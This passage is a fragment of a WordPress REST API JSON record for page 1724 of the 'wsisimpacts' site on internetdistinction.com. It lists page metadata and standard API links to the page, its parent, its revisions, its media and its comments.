[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":1668,"menu_order":21,"comment_status":"open","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-1724","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1724","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/comments?post=1724"}],"version-history":[{"count":0,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1724\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1668"}],"wp:attachment":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/media?parent=1724"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}